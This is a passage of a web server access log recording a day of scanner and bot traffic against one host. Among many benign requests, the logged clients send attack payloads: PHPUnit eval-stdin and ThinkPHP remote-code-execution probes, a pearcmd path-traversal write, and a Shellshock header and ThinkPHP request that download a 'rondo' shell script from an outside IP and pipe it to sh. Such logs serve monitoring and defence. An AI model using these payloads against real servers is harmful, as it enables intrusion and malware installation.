[Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:06 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:07 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:07 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:07 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:07 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:07 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:07 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:07 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:07 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:07 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:07 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:07 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:07 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:07 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:07 +0000] 404 - GET http 91.82.83.208 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:07 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:07 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:51:07 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 93.152.217.192] [Length 150] [Gzip -] "libredtail-http" "-" +[22/Jan/2026:10:55:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:10:57:15 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.108 Safari/537.36 UCBrowser/12.13.0.1207" "-" +[22/Jan/2026:11:22:10 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:11:22:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:11:23:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:11:23:25 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:11:27:26 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:11:29:34 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:11:45:11 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[22/Jan/2026:11:46:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:11:46:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:11:52:43 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 204.76.203.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:12:12:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:12:16:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:12:19:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:12:20:23 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:12:20:37 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:12:21:46 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.166.242.189] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[22/Jan/2026:12:39:20 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:12:46:11 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:12:46:32 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:12:58:55 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:13:03:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:13:06:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:13:13:09 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:13:13:12 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:13:18:04 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:13:19:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.82] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:13:29:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:13:45:46 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:13:47:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 151.242.144.223] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36" "-" +[22/Jan/2026:13:47:18 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.88] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:13:47:22 +0000] 200 - GET http 91.82.83.208 "/" [Client 199.45.155.88] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[22/Jan/2026:13:47:28 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.88] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:13:47:32 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[22/Jan/2026:13:47:40 +0000] 404 - GET http 91.82.83.208 "/.well-known/security.txt" [Client 199.45.155.88] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[22/Jan/2026:13:47:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.88] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:13:54:35 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:14:02:39 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:14:03:43 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:14:13:38 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:14:18:28 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:14:22:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:14:33:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 197.157.195.180] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[22/Jan/2026:14:36:35 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.18] [Length 1033] [Gzip -] "-" "-" +[22/Jan/2026:14:45:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:14:55:23 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:14:57:31 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:15:00:37 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:15:06:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 119.30.70.42] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.3" "-" +[22/Jan/2026:15:06:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:15:13:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:15:23:24 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:15:36:00 +0000] 400 - - http localhost "-" [Client 185.243.96.116] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:15:36:00 +0000] 400 - - http localhost "-" [Client 185.243.96.116] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:15:39:38 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:15:47:18 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:15:50:35 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:15:53:11 +0000] 400 - GET http 91.82.83.208 "/" [Client 206.168.34.212] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[22/Jan/2026:15:53:18 +0000] 400 - - http localhost "-" [Client 206.168.34.212] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:15:54:11 +0000] 400 - GET http 91.82.83.208 "/robots.txt" [Client 206.168.34.212] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[22/Jan/2026:15:59:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:16:04:57 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:16:11:40 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:16:11:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:16:15:41 +0000] 404 - POST http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[22/Jan/2026:16:15:41 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%29%7Csh" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[22/Jan/2026:16:15:41 +0000] 404 - POST http 91.82.83.208 "/index.php?s=captcha" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[22/Jan/2026:16:15:42 +0000] 200 - GET http 91.82.83.208 "/" [Client 192.159.99.95] [Length 1033] [Gzip -] "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.\x5Cqre.sh?=6f71068b||busybox wget -qO- http://41.231.37.153/rondo.\x5Cqre.sh?=6f71068b||curl -s http://41.231.37.153/rondo.\x5Cqre.sh?=6f71068b)|sh\x22& # rondo2012@atomicmail.io" "-" +[22/Jan/2026:16:15:42 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 192.159.99.95] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:16:17:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.135.135.57] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[22/Jan/2026:16:25:50 +0000] 405 - POST http 91.82.83.208 "/" [Client 195.178.110.25] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0" "-" +[22/Jan/2026:16:25:50 +0000] 404 - POST http 91.82.83.208 "/_next" [Client 195.178.110.25] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[22/Jan/2026:16:25:50 +0000] 404 - POST http 91.82.83.208 "/api" [Client 195.178.110.25] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[22/Jan/2026:16:25:50 +0000] 404 - POST http 91.82.83.208 "/_next/server" [Client 195.178.110.25] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[22/Jan/2026:16:25:51 +0000] 404 - POST http 91.82.83.208 "/app" [Client 195.178.110.25] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136." "-" +[22/Jan/2026:16:25:51 +0000] 404 - POST http 91.82.83.208 "/api/route" [Client 195.178.110.25] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0" "-" +[22/Jan/2026:16:30:36 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 